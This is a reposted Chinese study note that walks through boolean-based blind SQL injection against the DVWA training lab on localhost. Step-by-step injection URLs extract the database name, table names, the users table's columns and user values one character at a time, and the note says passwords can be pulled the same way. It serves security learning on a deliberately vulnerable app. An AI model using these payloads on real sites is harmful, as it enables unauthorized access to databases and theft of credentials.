ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 数据库> 文章详细

sql-injection-Blind-low-level-notes-SQL注入-dvwa靶场

2021-03-16 18:32:27  阅读:235  来源: 互联网

标签:Blind users level notes dvwa Submit ASCII SELECT schema


盲注
猜数据库长度
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit#
User ID exists in the database.
得出database()长度为4
猜解数据库的名字
SELECT ASCII('d');#100
SELECT ASCII('v');#118
SELECT ASCII('w');#119
SELECT ASCII('a');#97

SELECT SUBSTR(DATABASE(),1,1);#d
SELECT SUBSTR(DATABASE(),2,1);#v
SELECT SUBSTR(DATABASE(),3,1);#w
SELECT SUBSTR(DATABASE(),4,1);#a

SELECT ASCII('d')=100;#1
SELECT ASCII('v')=118;#1
SELECT ASCII('w')=119;#1
SELECT ASCII('a')=97;#1

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=99--+&Submit=Submit#
User ID is MISSING from the database.

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=100--+&Submit=Submit#
User ID exists in the database.

得出database()第一个字段是'd'
同理得出第二个字段是'v'...三字段'w'...四字段'a'
得出数据库名database() = 'dvwa'
猜解dvwa数据库中的表个数
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=1;#0
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2;#1
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3;#0

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2)--+&Submit=Submit#
#--> User ID exists in the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3)--+&Submit=Submit#
#--> User ID is MISSING from the database.
得出dvwa数据库中的表数量为2
猜解dvwa数据库中第一张表表名的第一个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=102)--+&Submit=Submit#
#--> User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=103)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为g
同理得第二个字符
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),2,1))=117)--+&Submit=Submit#
#--> User ID exists in the database.
得到第一个字符为u
同理可得表名:guestbook、第二张表:users
猜解dvwa数据库中的users表的字段数
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name= 'users' AND TABLE_SCHEMA='dvwa')=8)--+&Submit=Submit#
#--> User ID exists in the database.
得到:users表一共有8个字段
猜解dvwa数据库中的users表的具体字段
#--> limit 6,1 选到user字段
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND(ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),1,1))=117)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),2,1))=115)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),3,1))=101)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),4,1))=114)--+&Submit=Submit#
#--> User ID exists in the database.
SELECT ASCII('u');#117
SELECT ASCII('s');#115
SELECT ASCII('e');#101
SELECT ASCII('r');#114

#--> 得到users表的字段user
同上得到users表的字段password
猜解users表中的user字段值
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND length(substr((select user from users limit 0,1),1))=5--+&Submit=Submit#
User ID exists in the database.user字段中第1个字段值的字符长度=5

SELECT ASCII('a');#97
SELECT ASCII('d');#100
SELECT ASCII('m');#109
SELECT ASCII('i');#105
SELECT ASCII('n');#110
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),1,1))=97))--+&Submit=Submit#
#第一个字段值的第一个字符a

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),2,1))=100))--+&Submit=Submit#
#第一个字段值的第二个字符d

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),3,1))=109))--+&Submit=Submit#
#第一个字段值的第三个字符m

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),4,1))=105))--+&Submit=Submit#
#第一个字段值的第四个字符i

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),5,1))=110))--+&Submit=Submit#
#第一个字段值的第五个字符n

组合得到:admin
同理可得user字段第二个值(SELECT USER FROM users LIMIT 1,1),再尝试得到:Gordonb
同上,猜解users表中的password字段值。
结束。

标签:Blind,users,level,notes,dvwa,Submit,ASCII,SELECT,schema
来源: https://www.cnblogs.com/codeace/p/14545148.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有